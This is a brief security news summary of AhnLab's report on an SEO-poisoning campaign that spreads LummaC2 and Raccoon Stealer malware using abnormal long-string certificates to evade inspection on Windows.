October 11, 2023 at 11:41AM
Attackers are using a new method of certificate abuse to spread info-stealing malware, including stealing cryptocurrency from Windows systems. The campaign involves search engine optimization poisoning to deliver malicious pages promoting illegal software downloads. The malware uses special certificates with long strings of non-English characters, making them difficult to detect. Windows users are advised to be cautious when downloading software online and to watch out for indicators of compromise.
From the meeting notes, it appears that attackers are employing a new type of certificate abuse in order to spread info-stealing malware. The goal of this campaign is to collect credentials and other sensitive data, with a particular focus on stealing cryptocurrency from Windows systems. The attackers are using search engine optimization (SEO) poisoning to deliver search results that feature malicious pages promoting illegal software cracks and downloads. In the background, these pages deliver remote access Trojans (RATs) known as LummaC2 and RecordBreaker.
The researchers at AhnLab have noted that the malware being used in this campaign utilizes abnormal certificates with long strings in the Subject Name and Issuer Name fields. These certificates contain non-English languages, special characters, and punctuation marks, which makes them difficult to inspect using standard tools or infrastructure on Windows systems. The current sample in circulation consists of a URL-encoded malicious script designed to download and execute PowerShell commands from a specific address.
According to the researchers, similar samples of this malware have been consistently distributed for over two months, suggesting a specific intent behind the attackers’ actions. The certificates used in this campaign are likely to fail signature verification, but they could still confuse and bypass some defenses. This is a novel type of certificate abuse, as threat actors usually disguise themselves with normal certificates that can be verified.
LummaC2 and Raccoon Stealer, the two malware strains observed in this campaign, are familiar to security researchers and have various malicious functionalities. However, their primary focus is on stealing data from infected systems. Upon infection, they can transmit sensitive user information such as account credentials, documents, and cryptocurrency wallet files to the threat actor, potentially leading to severe secondary damages. Additionally, another piece of malware designated by the threat actor is installed to enable continuous malicious activities.
While the long-string certificate technique is still being refined and has had only partial success so far, Windows users are advised to exercise caution when downloading software online, especially from websites known for distributing illegal versions of popular applications. AhnLab researchers have provided indicators of compromise and a list of command-and-control domains associated with the delivery of LummaC2 and Raccoon Stealer V2 to assist users in identifying and mitigating potential threats.